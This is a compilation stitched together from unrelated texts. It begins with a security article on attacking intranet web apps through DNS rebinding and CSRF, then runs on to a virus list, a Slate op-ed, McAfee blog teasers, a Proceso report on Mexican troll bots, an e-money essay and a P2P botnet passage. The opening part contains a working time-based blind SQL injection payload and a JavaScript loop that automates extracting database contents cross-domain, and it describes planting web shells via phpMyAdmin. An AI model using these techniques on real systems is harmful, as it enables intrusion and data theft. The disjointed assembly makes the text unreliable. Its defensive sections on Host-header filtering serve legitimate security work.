The method we will be describing now is convenient if there are known vulnerable web applications on the victim’s computer. We showed earlier how it is possible to identify and brute force WordPress instances in local networks using a technique called Cross Site History Manipulation, or XSHM. With XSHM it is possible to retrieve information about running applications and under some circumstances, one can even get feedback whether or not a CSRF attack has succeeded.

This method is too conspicuous to be used for brute force attacks or to scan local networks, since it requires a refreshing window or redirects. However, it can be done stealthily for short checks, since multiple redirects are not unusual on modern websites. Legitimate reasons for them include OAuth implementations and ad networks that redirect users to different domains.

So it is possible to quickly identify which CMS or web application is running on a given host. If there are known vulnerabilities an attacker can use a known exploit and send the data back to himself, either by using javascript with DNS rebinding, Out Of Band methods, or other Same Origin Breaches.

SQL injection Vulnerabilities on Your Local Network

Imagine a web application with a SQL injection vulnerability in a SELECT statement that is only exploitable through CSRF, and the attacker knows that an ID parameter in the admin panel is vulnerable. The application's database user has only the privileges needed to retrieve data. The attacker cannot use an out-of-band method, which on MySQL needs file privileges, stacked queries do not work in such a setup, and he cannot simply append an INSERT statement to the query.

However, he can use the SLEEP() function, which, combined with a condition, forces the database to wait a given number of seconds before the query continues. So, for example, the attacker issues a query that says:

if the first character of the admin password is “a”, sleep for 2 seconds.

If the request takes less than two seconds to complete, the first character of the password is not an “a”. The attacker tries the same with the letter “b”. If the request takes two seconds or longer to complete, the first character of the password is “b”. The attacker uses the same method to guess the remaining characters of the password.

This type of attack is called time-based blind SQL injection. In the above scenario it does not seem useful, because the attacker cannot issue the requests directly but has to resort to CSRF, and the delay can only be observed in the user's browser as a different page loading time.

Exploiting SQL injection Vulnerabilities Cross-Domain

JavaScript can tell whether a page has finished loading by using the “onload” or “onerror” event handler. Let's say the attack is GET based (POST is also possible) and the vulnerable parameter is called id. The attacker can:

1. Record the time it takes for the page to load without the injected condition.

2. Point an img tag at the vulnerable application, e.g.

<img src="http://192.168.1.123/admin.php?page=users&id=1+AND+IF(SUBSTRING(DATABASE(),1,1)='b',sleep(2),0)" onerror="pageLoaded()">

(The response is HTML rather than an image, so it is the onerror handler, not onload, that fires once the server has answered.)

3. Record the time when pageLoaded() runs.

4. Compare the values from steps 1 and 3.

If the difference in loading time is two seconds or more, the condition was true and the first letter of the database name is “b”. If not, the attacker proceeds with the letters “c”, “d”, “e” and so on until there is a measurable delay. Because of this timing side channel it is possible to leak page loading times and therefore, in combination with a SQL injection, valuable data.
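The four steps above, generalised from one guess to a loop that recovers a whole string, as an added example that is not code from the original article. The target URL, the injectable numeric id parameter, a MySQL backend (so SLEEP() exists) and the simulated server at the end are all assumptions; in a real browser the measurement function is the <img> timing from step 2, while the simulated oracle lets the loop run offline.

```javascript
// Added example, not code from the original article: the timing side channel
// described above, generalised to recover a string character by character.
// Hypothetical target: the numeric "id" parameter of
// http://192.168.1.123/admin.php?page=users is injectable and the backend is
// MySQL, so SLEEP() is available.
const TARGET = 'http://192.168.1.123/admin.php?page=users&id=1'; // assumed
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789_';

// One guess: "is character <pos> (1-indexed, as in SUBSTRING) of DATABASE()
// equal to <ch>?"  True -> MySQL sleeps delaySec seconds; false -> answers at
// once.  "+" decodes to a space in the query string, as in the article's tag.
function buildPayload(pos, ch, delaySec = 2) {
  return `${TARGET}+AND+IF(SUBSTRING(DATABASE(),${pos},1)='${ch}',SLEEP(${delaySec}),0)`;
}

// Browser side: load the URL in an <img>.  The reply is HTML, not an image, so
// onerror fires as soon as the server has answered.  Only the elapsed time is
// observed and the body is never read, so the Same Origin Policy does not
// block this.  (Not invoked when the file runs outside a browser.)
function measureWithImage(url) {
  return new Promise((resolve) => {
    const start = performance.now();
    const img = new Image();
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url;
  });
}

// Generic extraction loop.  `measure(url)` resolves to the load time in ms.
// A hit is only accepted after a second measurement agrees, so one network
// hiccup does not turn into a wrong character.
async function extractSecret(measure, { maxLength = 64, delaySec = 2 } = {}) {
  const baseline = await measure(TARGET);              // cost of a "false" answer
  const threshold = baseline + (delaySec * 1000) / 2;  // halfway to a "true" one
  let secret = '';
  for (let pos = 1; pos <= maxLength; pos++) {
    let found = null;
    for (const ch of ALPHABET) {
      const url = buildPayload(pos, ch, delaySec);
      if ((await measure(url)) >= threshold && (await measure(url)) >= threshold) {
        found = ch;
        break;
      }
    }
    if (found === null) break; // end of string, or a character outside ALPHABET
    secret += found;
  }
  return secret;
}

// Constructed stand-in for the victim's server so the example runs offline:
// it parses the guess back out of the URL and reports a slow answer only when
// the guess is right.  No network and no real sleeping.
function makeSimulatedOracle(databaseName, baselineMs = 40) {
  const guess = /SUBSTRING\(DATABASE\(\),(\d+),1\)='(.)',SLEEP\((\d+)\)/;
  return async (url) => {
    const m = guess.exec(url);
    if (!m) return baselineMs;
    const [, pos, ch, delaySec] = m;
    const hit = databaseName[Number(pos) - 1] === ch;
    return baselineMs + (hit ? Number(delaySec) * 1000 : 0);
  };
}

// Run against the simulated server; in a real attack pass measureWithImage.
extractSecret(makeSimulatedOracle('blog_db')).then((name) => {
  console.log('recovered DATABASE():', name); // blog_db
});
```

The loop stops on the first position where no character in the alphabet produces a delay, which is how it finds the end of the string without knowing its length in advance. On a real network the threshold should be set from several baseline samples rather than one, and the delay chosen large enough to stand out from the victim's normal page load jitter.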

Strong Passwords Are a Must, Even if The Web Application Is Not Public

Image for a password.

People tend to use weak passwords on web applications that run on machines behind a firewall. That is a mistake. Let's say an attacker has managed to compromise another computer on the same local network. If he notices a web application on another host, he will try to brute force the password of the admin panel. And if he guesses the credentials, since many modern web applications have upload functionality, he can upload malicious files. An attacker is therefore often able to plant a web shell on the server and issue commands on the machine hosting the web application.

But as mentioned above, there does not need to be a prior compromise before the brute forcing. With DNS rebinding it is possible to brute force the web application from a malicious website with low latency, since the web application already runs on localhost and the requests never leave the machine.

Therefore it is important to always use strong passwords, no matter from where the application is accessible.

Insecure phpMyAdmin Instances Can Be Dangerous


phpMyAdmin, a very popular MySQL manager, is often installed on developers' machines, and unfortunately most of these installations are not secure. For example, some install scripts leave MySQL and phpMyAdmin without authentication, or with a blank password, by default. This makes them very easy to exploit through DNS rebinding, since no prior knowledge of a password is required to issue MySQL commands.

What makes phpMyAdmin especially dangerous is that it often runs with the highest possible privileges, as the MySQL root user. Once an attacker gains access to it, he can:

  • Extract data from all databases
  • Read Files
  • Write files

Some MySQL configurations restrict file operations to a specific directory (the secure_file_priv setting). More often than not this restriction is not applied, especially in older versions. An attacker can then read arbitrary files and write attacker-controlled content into the web root, which means he can plant a web shell, a small script that lets him issue system commands. From there he will most probably be able to escalate privileges and place malware on the system or exfiltrate sensitive data.

Typical Vulnerable Devices Found On a Network

Routers Need To Be Kept Up To Date

Web applications are not the only things at risk on a network. Devices such as routers can also be targeted, mainly because they have a web interface that typically runs with root privileges. Routers tend to be a popular and easy target because:

  • Their web interfaces are poorly coded.
  • They sometimes have backdoors or remote management interfaces with default passwords that users never change.
  • Since storage space on routers is tight, manufacturers often ship old and probably vulnerable versions of software, as long as they serve the purpose.

When a router's admin web portal is not reachable from the outside, attackers can use DNS rebinding to log into it and hijack it. Such attacks are possible, but they do not scale the way the 2016 Mirai infection did: Mirai infected thousands of home routers by logging in over telnet with default passwords and adding them to large botnets. Routers are hijacked for a number of reasons; here are just a few:

  1. They can be used for Distributed Denial of Service (DDoS) attacks.
  2. Attackers can use them for Man in the Middle (MITM) attacks to intercept the traffic that passes through them.
  3. Attackers use them as a foothold to reach other machines on the router's network.

IoT Devices - Many of Which Are Insecure

Mirai did not only target home routers. Other victims included IP cameras and digital video recorders. More often than not, security does not play an important role in the design of Internet of Things (IoT) devices, and we install such insecure products on our home and corporate networks.

To make things worse, many people without IT security experience disable firewalls and other protections to make IoT devices, such as an IP camera, reachable over the internet. Such setups have unpredictable consequences for the security of everything else connected to the network: they are an open invitation to attackers and let them pivot to other parts of the system.

Vulnerable NAS Servers

NAS servers have become very common. They manage and share files across all the devices on a network. Like almost any other device, a NAS server is configured via a web interface, from which users can, for example, download files.

NAS servers are therefore additional attack surface. As explained above, an attacker can use CSRF or DNS rebinding to interact with the web interface. Since these web interfaces typically run as root, so that users can change ports and similar settings, an attacker who gains access can easily compromise the whole server.

Vulnerable Services Typically Used By Developers

Misconfigured MongoDB Services


Even on the rare occasion that a MongoDB instance is properly set up to bind to localhost instead of 0.0.0.0, it can still be attacked through its REST API. The REST API is typically enabled because it is a useful feature for frontend developers: it lets them work with their own test datasets without having to rely on a finished backend. The data is returned as JSON and can therefore be used with native JavaScript functions.

However, this web interface has serious flaws, including CSRF vulnerabilities that can lead to data theft, as described in our proof of concept of a CSRF attack against the MongoDB REST API. In short, we used an out-of-band (OOB) technique to exfiltrate the data over DNS queries. The API is marked as deprecated, but it was still present in the latest version we tested when we wrote that article.

DropBox information Disclosure


Another rather interesting vulnerability is the one we found in the Dropbox client for Windows. To communicate with the client, the website dropbox.com sends commands to a WebSocket server listening on localhost.

By default a WebSocket server accepts connections and data from any page, even one served by another website. To verify the origin, the Dropbox client therefore uses a handshake that must be completed correctly before the sender is trusted.

The handshake consists of a check of a nonce, a string of characters known only to Dropbox and the client, which is queried directly from the Dropbox server, and there was probably also a check of the Origin header. A connection from another website can therefore be established, but no data should be sent by the localhost server if the origin is not correct.

However, when any website connected to the WebSocket server on localhost, the Dropbox client sent a handshake request prematurely, before the origin had been verified. That request included the id of the particular request, the operating system in use and the exact version of the Dropbox application. Such information should not leak through this channel, especially since any third-party website could read it merely by opening a connection to the server on localhost.

Note: The issue was responsibly reported to Dropbox via HackerOne. It was triaged immediately and awarded an initial bounty plus a bonus, since the report helped them find another issue.

How Can You Prevent These Type of Attacks?

Simply put, to prevent DNS rebinding attacks at the server level, block any request whose Host header does not match a whitelist. Below is how you can do this on the Apache and IIS web servers.

Blocking DNS Rebinding Attacks on Apache Server

On Apache 2.4 you can deny access when the Host header is not exactly 127.0.0.1 by combining an <If> block with the Require directive from mod_authz_core. Add these lines to your configuration:

<If "%{HTTP_HOST} != '127.0.0.1'">
Require all denied
</If>

If someone launches a DNS rebinding attack, the Host header carries the attacker's domain, so the request is blocked and the server returns an HTTP 403. Note that the comparison is exact: HTTP_HOST includes the port when the client sends one (for example 127.0.0.1:8080), and requests addressed to localhost rather than 127.0.0.1 are also denied, so extend the condition to cover every host name and port you legitimately use.

Blocking DNS Rebinding Attacks on Windows IIS

Blocking DNS rebinding attacks on the Microsoft IIS web server is easy. Add a rule of type "Request blocking" in the URL Rewrite module with the following options:

  • "Block access based on" set to "Host header"
  • "Block request that" set to "Does Not Match the Pattern", where the pattern lists one or more allowed host headers (source).

Other Measures to Block Such Type of Attacks

Another good countermeasure is to block third-party cookies in the browser and to set the SameSite attribute on the cookies of the web application you are developing. Neither stops DNS rebinding on its own, because the rebound request is made to the attacker's origin and carries no cookies for the internal application; what they do is limit what a classic CSRF request can do with an existing session.

Other than that, apply the same security measures to internal websites as if they were publicly available. The web application should not be vulnerable to CSRF, cross-site scripting, SQL injection or other web vulnerabilities, so that the testing environment stays safe.

As an additional measure, run the web application in a virtual machine. Even though this is often unnecessary and complicates matters, it can lessen the impact of a compromise. This setup is mostly recommended for security researchers who want to run deliberately vulnerable web applications on their machine.

Live Demo of Firewall Bypass

Sven Morgenroth, the researcher who wrote this article, was featured on Paul's Security Weekly. During the show, Sven demonstrated how an attacker can exploit the vulnerabilities documented above to bypass firewalls.


          Viruses that have caused the most damage:        

• Kneber botnet
• Storm Worm
• Leap-A/Oompa-A
• Sasser and Netsky
• MyDoom
• Nimda (2001): known as the fastest-spreading virus; 22 minutes passed from its release onto the network until it topped the lists of the most dangerous attacks.
• SQL Slammer/Sapphire
• Code Red and Code Red II
• Klez (2001): one of the first viruses to gain sophistication; it could disable antivirus software and pose as it. It acted as both a worm and a trojan and could impersonate the sender of an email.
• I LOVE YOU: detected on Thursday, May 4, 2000, when it infected thousands of computers around the world; this code is considered one of the fastest ever at spreading and infecting large numbers of computers.
• Melissa: attacked thousands of users and companies after being spread as an infected MS Word document posted to a Usenet newsgroup, a discussion list about porn sites.
• Monkey
• Natas
• Ping Pong
• Friday the 13th
• Michelangelo


http://www.tecnoget.com/los-10-virus-informaticos-mas-letales


          Exactly How Stupid of an Idea Is a U.S.-Russia Cybersecurity Unit?        

You probably felt much safer after President Trump tweeted Sunday that he and Vladimir Putin had agreed to form an “impenetrable Cyber Security unit” to protect us from future computer intrusions. With Russia helping to oversee cybersecurity for our next election cycle, what could possibly go wrong?

Trump appears to have developed some misgivings about the supposed agreement (or at least the reaction to it), tweeting later Sunday that just because he and Putin “discussed a Cyber Security unit doesn’t mean I think it can happen. It can’t-but a ceasefire can,& did!”

Whenever people advertise their cybersecurity product/service/team/unit/company as “impenetrable,” it’s a good sign that you should run away as fast as possible when they offer you a contract. Arguably, whenever someone tries to tamper with your elections or target voting software vendors and local election officials, that’s also a good sign that you should run away as fast as possible when they propose a cybersecurity partnership. Actually, don’t run. Shut off your smartphone, set up two-factor authentication, and don’t click on any links in your email.

In fairness, it’s unclear who proposed the partnership or how seriously the proposal was intended given Trump’s later claim that it can’t happen. Perhaps it was one of those offhand pleasantries that neither party ever plans to follow through on—like when you run into an old, not-very-close acquaintance on the street and say, “We should get brunch some time and catch up!” even though both of you know you’ll never actually do it, just because it sounds friendlier than “Have a nice life.”

Truly, this would be the best possible tone in which to propose such an alliance. “We should form an impenetrable cybersecurity unit!” “Yes, totally! I’ll email you sometime!” I even understand why that would seem friendlier to all concerned than, well, pretty much any other conversation about cybersecurity that Trump and Putin could possibly have had.


If, however, the joint U.S.-Russia impenetrable unit was a real plan to enmesh Russia more deeply in U.S. cybersecurity efforts, then perhaps Trump changed his mind in light of the roughly 1,000 fox-guarding-the-henhouse Twitter jokes that followed its announcement. Sen. Marco Rubio tweeted Sunday, “Partnering with Putin on a ‘Cyber Security Unit’ is akin to partnering with Assad on a ‘Chemical Weapons Unit’.” Matthew Yglesias went with: “Al Capone & I discussed forming an impenetrable tax evasion unit.” Former Secretary of Defense Ash Carter compared it to “the guy who robbed your house proposing a working group on burglary.”

In case it hasn’t already been made clear to you, it is a stupefyingly bad idea to partner with Vladimir Putin on trying to defend against cyberthreats. If anything, opening our networks to Russian “assistance” and jointly planning our defensive strategies would only make U.S. cyberinfrastructure more vulnerable to attacks from Russia (not that it needs the help).

An international partnership on cybersecurity can mean many things—it can mean mutual assistance with enforcement and criminal investigations, or sharing threat information and intelligence, or jointly developing software that can be used to target adversaries’ computer systems, or even jointly developing tools and techniques that can be used to detect and mitigate threats. An “impenetrable” unit hints most closely at the last of these functions—a defensive joint effort in which the two countries share not just intelligence but also technical expertise and controls to protect their systems against intruders. But people who help design and implement your defenses then know an awful lot about the way your systems work and how, precisely, they are protected. Possibly, they’re even writing code and giving it to you to download on your computers to help make them more impenetrable. And if that code also created backdoors on every computer it was installed on so that Russia had easy access to control those systems, who would be surprised?

International cybersecurity partnerships are usually a good thing. The United States should (and does) work with international allies like Canada, the United Kingdom, France, Germany, South Korea, Australia, and Israel to help strengthen its computer security and enlist help. But to form any kind of meaningful international cybersecurity partnership, two countries have to be able to agree what they’re trying to protect against. If two countries have totally different visions of what a “secure Internet” looks like, then they’re not going to be able to work together to achieve it.

And Russia and the United States have never had compatible ideas about what cybersecurity means—even before the 2016 elections. For instance, the FBI’s most wanted cybercriminal is a man named Evgeniy Mikhailovich Bogachev who for years operated an enormous botnet that he used to steal more than $100 million. Bogachev lives in Anapa, Russia, owns property in Krasnodar, Russia, enjoys boating on the Black Sea—and has never been arrested by Russian authorities. Not only that, but the New York Times reported earlier this year that the Russian government actually relies on Bogachev to provide it with useful intelligence about the victims of his thefts and files from their infected computers. It’s hard to see how two countries could ever get on the same page when it comes to cracking down on cybercrime while one is offering a $3 million reward for any information leading to the arrest of a man who is currently acting as a sort of informal government contractor and consultant in the other.

Bogachev’s story offers a hint of what it might mean if the two countries did try to work together. To form a joint unit (much less an impenetrable one) that does anything beyond offer Russia an up-close look at our cyber defense operations, the two countries would have to reach some kind of consensus on what constitutes cybercrime and cybercriminals. Ideally, that might mean Russian authorities coming around to view someone like Bogachev, who distributes malware and uses it to steal money, as a cybercriminal—but there’s no reason to think they would suddenly have such a change of heart. Alternatively, it could mean the United States deciding to come around to Russia’s perspective and deciding to collect intelligence from cybercriminals rather than arrest them. Russia has used that strategy to great effect—it offers the ability to gather lots of stolen information while still distancing the government from its provenance and, of course, officially condemning cybercrime.

A cybersecurity partnership with Russia would inevitably make the United States weaker. It would make our computer systems weaker by providing information and access about our network infrastructure. It would make our definition of cybercrime weaker by forcing us to collude with a country that harbors some of the most reprehensible cybercriminals in the world. It would make our defensive posture weaker by signaling to other countries that they are free to do what they like to U.S. computers. After all, the only consequences they are likely to face are invitations to please come help us protect ourselves.

This article is part of Future Tense, a collaboration among Arizona State University, New America, and Slate. Future Tense explores the ways emerging technologies affect society, policy, and culture. To read more, follow us on Twitter and sign up for our weekly newsletter.


          The IoT of bricks: Someone is bricking insecure IoT devices        

I can’t justify the vigilantism, but someone is bricking vulnerable IoT devices. I ponder the morality of it all. It’s called BrickerBot. It finds IoT devices with dubious security and simply bricks/disables them. Insecure dishwashers, teapots, refrigerators, security cameras – all become part of vast botnets. The botnets can do many things, and we’ve seen …

The post The IoT of bricks: Someone is bricking insecure IoT devices appeared first on McAfee Blogs.


          TinyNuke May be a Ticking Time Bomb        

On March 12th,  2017 a low-profile developer uploaded to Github a mostly functional Botnet code named TinyNuke. The user, Aainz, uses his real name in connection with this code. It’s not unusual for security professionals or hobbyist to release proof of concept code to enable the industry to learn from the latest techniques and test …

The post TinyNuke May be a Ticking Time Bomb appeared first on McAfee Blogs.


          Are Printers Becoming Yet Another IoT-Based Threat?        

Over the past couple of months, a lot has been written about the Mirai botnet that was targeting vulnerable devices connected to the Internet. And based on the embedded password list, we can determine that the targets were diverse– from IP-camera’s, DVR’s, TV receivers, routers to printers. Printers? Yes, printers. Over the years, these devices …

The post Are Printers Becoming Yet Another IoT-Based Threat? appeared first on McAfee Blogs.


          ESRT @alexandrosilva - New Hakin9 available: Botnets, Malware, Spyware - How to Fight Back ...        
ESRT @alexandrosilva - New Hakin9 available: Botnets, Malware, Spyware - How to Fight Back http://www.secuobs.com/twitter/news/148441.shtml
          Recommended Reads – 26 March 2011        

FireEye Malware Intelligence Lab: An overview of Rustock – “As you might have seen in the news, the largest spam botnet, Rustock, was recently taken down in a collaborated, coordinated way. All parties involved were bound by a sealed federal lawsuit against the John Doe’s involved, but now that … [visit site to read more] [...]

The post Recommended Reads – 26 March 2011 appeared first on Malware Help. Org.


          Mexican Cyber-Mercenaries        
 Translated from Proceso by Erin Gallagher ...follow Erin on Medium


After reporting threats against him, Mexican journalist Alberto Escorcia is more threatened than ever.

The following is a translation of a July 22, 2017 report by Mathieu Tourliere in Proceso magazine...


Mexico City (Proceso): When Alberto Escorcia Gordiano decided to dedicate himself to social network analysis about three years ago, he thought that he entered in a “calmer” world that he could “control.”

However, he started receiving death threats that forced him to leave the country twice. He even had to change his address after two individuals forced the door of his apartment open on the night of June 9. The police told him that they were "probably thieves," Escorcia reports in an interview with Proceso.

- What part of your work could set off these attacks? he’s asked.



- I don’t really publish very severe things, but I do show that the cyber attacks and threats are coordinated operations; They’re not just two or three accounts spreading a rumor. My graphs and articles show that they are the product of two or three thousand organized accounts that have a purpose and an impact.


On his website LoQueSigue he revealed that an army of 75,000 bots — fake accounts on social media controlled by computer programs impeded the protests for the disappearance of the 43 normalistas from Ayotzinapa. Escorcia also documented the attacks launched from these accounts against journalists and showed that they reactivated in Alfredo del Mazo’s campaign for governor of Mexico State.

He also documented links between troll accounts, famous for threatening and harassing journalists, including Carmen Aristegui; Álvaro Delgado, Proceso reporter; Héctor de Mauleón; Denise Dresser; and American journalist Andrea Noel. These accounts "woke up" on the eve of the last state elections and waged a dirty war against Delfina Gómez and Josefina Vázquez Mota.
“Something that would seem like a rumor, I make it visible. It’s like with the government spying: for a long time it was denounced by activists, until they had evidence and they could demonstrate it,” he adds.
Escorcia explains that coordinating tens of thousands of bots involves the hiring of dozens of operators — who program the accounts and relaunch discussion topics — at a high level of sophistication. In other words, these methods can’t be done by just anyone.

“All the political parties use them, the PRI especially; The PAN with (Rafael) Moreno Valle, and I’ve even detected that Ricardo Monreal (from Morena) used them,” he says.


Hidden Attackers

Botnets remained “dormant” for months, but reactivated as the Mexican state elections approached: they boosted the messages of Alfredo del Mazo from the PRI and participated in defamation campaigns.

In news portal sinembargo.mx, Escorcia documented that eight out of ten massive bot attacks were carried out against Delfina Gómez. “On election day and the day previous, there were 17 trending topics against Delfina,” he says.

During the campaign, these networks amplified the dissemination of both true and fake news. They were particularly active on April 11, when a helicopter threw leaflets over Texcoco municipality — a Morena bastion in the state — signed by a non-existent group of narco-traffickers. The bots spread that news, and a few days later boosted another piece of fake news that linked that group with the former mayor Higinio Martínez Miranda.

They also activated this past June 3 — the day before the election — when a group of unknown persons left bloody pig heads and crosses at the doors of Morena’s headquarters in the municipality of Tlalnepantla.



“The Mexican government responds to people organizing on social media with spying, repression and internet censorship. One day a researcher is going to realize there’s a relationship between the dirty war and the bots. Everything that happened with Alfredo Del Mazo, which was brutal, certainly influenced some people,” he estimates.

The activist explains that in Mexico there are four main groups of trolls: The Underground — the most violent group who send death threats with the victim’s name spelled out with bullets, the Legión Holk and the Legión Científica made up of large numbers of teenagers, and the Ingenieros, the oldest that changed course since “they practically don’t send threats but make Trending Topics for companies.”

Mexico’s misinformation wars : How organized troll networks attack and harass journalists and activists in Mexico

“They’re like cyber-mercenaries. Of the testimonies I’ve collected, they operate from troll centers that work for various parties and companies. I doubt they plan the attacks. According to my research, the agencies that hire them are the ones who design the campaigns. It may be the Ministry of the Interior or the state governments,” he adds.

The threats online follow the same pattern: a small account launches the message, and then larger accounts boost it, details the activist, and although there is no evidence that the same person or entity is behind the bots, trolls and fake news portals, he notes that those three elements are usually triggered at times that coincide.

“Mental Hell”
Proceso interviewed Escorcia for the first time in October 2014. At that time, he had enthusiastically developed an interactive map of cases of disappearances in Mexico. He described it as a “Wikileaks of the disappeared.”

His features now are more drawn. The last 2.5 years have been a “mental hell” for him.

“I’m very tired now. I hardly published anything on my website. I don’t have the energy I used to, I don’t go to protests anymore. I think it’s drained me. And when I realize the objective was to sow fear, it gives me more courage. Because I am very afraid.”

On December 5 2014, in the middle of the protests for the disappearance of the Ayotzinapa students, Escorcia gave an interview to journalist Carmen Aristegui. Almost 400 threats flooded in from Twitter and his website was attacked.

“You have to understand how it is: your phone doesn’t stop ringing, they curse you, send you pictures of dismembered bodies,” he says.

After that interview, death threats became part of his daily life. And when one of the trolls doxxed him and published his address and phone number online — after he documented the troll networks behind calls to loot shops during the gasolinazo protests, the virtual violence became reality.


[Instead of arresting my attackers, the city government asks whether or not I am working as a journalist]
He suffered assaults and harassment: individuals entered his building asking about him, between January and February they rang his doorbell every night, one day they forced open his neighbor’s door and on at least three occasions men with handheld radios followed him on his way to the subway.

Mexico’s Troll Bots Are Threatening the Lives of Activists

Until recently few people took the attacks on social media seriously. That incomprehension then cast doubt on Escorcia: They wondered, in the midst of murders of journalists and activists, if his case was legitimate or even real.

“More serious things happen. I can’t compare myself with Javier (Valdez, the journalist assassinated on May 15 in Culiacán). Someone knocked on my door and another killed him. Obviously my case is a lesser priority and I understand. But the torment stays with you, and it’s been three years.”

While this was happening, the PGJDF’s investigation (the attorney general of Mexico City) remained stagnant. Last May 12, when he went to the agency’s offices for a routine appearance, he noticed the officials had misplaced key evidence that identified people behind the accounts sending threats, including Daniel Carlos Penagos García, hiding behind the alias Perrito.

He deduced that the authorities had stopped investigating his case, which passed to the  Special Prosecutors’s Office for Crimes Against Freedom of Expression (FEADLE — Fiscalía Especial para la Atención de Delitos Cometidos contra la Libertad de Expresión).
“So if they fail to investigate them and then activate them to attack their political opponents, they are already part of the system. Maybe I have false hope that they will be stopped,” he laments.

Below: Thousands of bots took part in the Edomex campaign. Delfina was the main target of attacks.
This report was published in edition 2124 of Proceso magazine dated July 16, 2017

          E-Money        
E-money is defined by the European Commission as “electronically, including magnetically, stored monetary value as represented by a claim on the issuer which is issued on receipt of funds for the purpose of making payment transactions” (European Commission, n.d.). As such, E-money offers the same advantages as cash: real-time transactions and anonymity. Ken Griffin et al. (n.d.) note that there are a number of categories of E-money, including E-cash, digital cheques, digital bank cheques, smart cards, and electronic coupons and tokens. There are a number of E-money issuers, some well known such as PayPal and others less known such as Pecunix, Ukash and Bitcoin. Moreover, virtual worlds such as Second Life have their own E-money currency (e.g. L$) which can be earned, spent and exchanged for US dollars (SecondLife, n.d.). As stated previously, the main advantages of E-money are real-time transactions, low transaction fees and anonymity similar to cash transactions. There are, however, concerns about security and fraud, as well as questions about the financial backing of virtual currencies. For example, criminals are targeting Bitcoin digital wallets, or are using botnets to harness the collective resources of infected machines to mint virtual currency which can be exchanged for real money (Peter Coogan, 2011).

Credit cards, on the other hand, are backed by international organizations responsible for issuing and acquiring credit card transactions. Often the transaction fees (a flat fee or a percentage of the transaction) are charged to the merchant. From an end-user standpoint, credit cards are an existing and trusted technology whose security standard (e.g. the Payment Card Industry Data Security Standard) is verified by independent Qualified Security Assessors (QSAs). Additional benefits such as cashback, air miles and membership points increase adoption by consumers. The drawback (which some consumers consider an advantage) is that all purchases are made on credit and, if not paid in full, are subject to comparatively high interest rates.

It is difficult to compare the security risk of E-money and credit card technologies, as both have suffered high-profile thefts, such as the theft of 25,000 Bitcoins from 478 accounts (Jason Mick, 2011) and “a massive security breach at a credit card processor [that] has put 10 million accounts at risk” (Brandon Hill, 2012). On both fronts there are efforts to tighten security, as evidenced by the Payment Card Industry Data Security Standard (PCI SSC, 2010) and the MintChip Challenge by the Royal Canadian Mint to create a secure alternative to E-cash backed by the Canadian government (Emily Jackson, 2012).

With a variety of methods for exchanging funds electronically (payments and transfers) such as PayPal, MintChip, Bitcoin, and credit and debit cards, it is not surprising that Sweden is moving towards a cashless economy (CBCNews, 2012) in which different digital payment methods are used in parallel, each serving a different purpose (e.g. micropayments), rather than competing with each other.

Bibliography

  • Brandon Hill, 2012. “Global Payments Inc. Hit By Security Breach; 10M Visa, MasterCard Accounts at Risk” [online]. DailyTech. Available from: http://www.dailytech.com/Massive+Security+Breach+Hits+MasterCard+Visa+10M+Accounts+at+Risk/article24355.htm (accessed: April 14, 2012).
  • CBCNews, 2012. “Sweden moving towards cashless economy” [online]. Available from: http://www.cbsnews.com/8301-202_162-57399610/sweden-moving-towards-cashless-economy/ (accessed: April 14, 2012).
  • Emily Jackson, 2012. “Royal Canadian Mint to create digital currency” [online]. The Star. Available from: http://www.thestar.com/business/article/1159513--royal-canadian-mint-to-create-digital-currency (accessed: April 14, 2012).
  • European Commission, n.d. “e-Money” [online]. Available from: http://ec.europa.eu/internal_market/payments/emoney/index_en.htm (accessed: April 14, 2012).
  • Jason Mick, 2011. “Inside the Mega-Hack of Bitcoin: the Full Story” [online]. DailyTech. Available from: http://www.dailytech.com/Inside+the+MegaHack+of+Bitcoin+the+Full+Story/article21942.htm (accessed: April 14, 2012).
  • Ken Griffin, Phillip Balsmeier, Bobi Doncevski, n.d. “Electronic Money as A Competitive Advantage” [online]. Available from: http://journals.cluteonline.com/index.php/RBIS/article/download/5458/5543&ei=uVKFT-2kBoXh4QSvr4izBQ&usg=AFQjCNFHe4HkbgG7hbdsQzlWnXg1LR7MNA (accessed: April 14, 2012).
  • Payment Card Industry Security Standard Council, 2010. “Payment Card Industry (PCI) Data Security Standard” [online]. Available from: https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf (accessed: April 12, 2012).
  • Ross J. Anderson, 2008. “A Guide to Building Dependable Distributed Systems”. 2nd Edition. Wiley Publishing.
  • SecondLife, n.d. “Buy L$ ” [online]. Available from: https://secondlife.com/my/lindex/buy.php?lang=en_US (accessed: April 14, 2012).
  • Peter Coogan, 2011. “Bitcoin Botnet Mining” [online]. Symantec. Available from: http://www.symantec.com/connect/blogs/bitcoin-botnet-mining (accessed: April 14, 2012).

Criminal Activity On Peer-To-Peer (P2P) Networks

Criminal activity on peer-to-peer (P2P) networks is usually associated with the sharing of illegal material, such as copyrighted or offensive content (music, movies, snuff films or pornography). There are a number of cases where law enforcement agencies have successfully taken down such sites, as in the case of the Elite Torrents group (Charles Montaldo, 2005). More recently, peer-to-peer protocols such as BitTorrent and Kad have been used to command and control armies of digital zombies (botnets). A botnet, controlled by a botmaster, can be used for attacks such as spam and denial of service.
As bots become more and more sophisticated, allowing the controller to capture keystrokes, take screenshots, send spam and participate in denial of service attacks, and much harder to detect because of the inclusion of rootkit capabilities, “the most significant feature, however, is the inclusion of peer-to-peer technology in the latest version of the botnet's code” (Peter Bright, 2011). Moreover, some bots allow controllers to “sublet”, for a price, an infected machine's IP address for use as an anonymous proxy.
Peer-to-peer technology lets the attacker eliminate a “single point of failure”: a single (sometimes several) Internet Relay Chat (IRC) server or Really Simple Syndication (RSS) feed used to command the botnet. Over the years there have been a number of attempts by botnet developers to build a next generation utilizing a peer-to-peer control mechanism; “Slapper, Sinit, Phatbot and Nugache have implemented different kinds of P2P control architectures” (Ping Wang, Sherri Sparks, Cliff C. Zou, 2007), each with its own weaknesses. For example, the Sinit bot used random probing to discover other Sinit-infected machines, which resulted in easily detected network traffic. An insecure implementation of the authentication mechanism made Slapper easy to hijack, whereas Nugache contained a list of static IP addresses used as its initial seed (David Dittrich, Steven Dietrich 2008; David Dittrich, Steven Dietrich 2009).
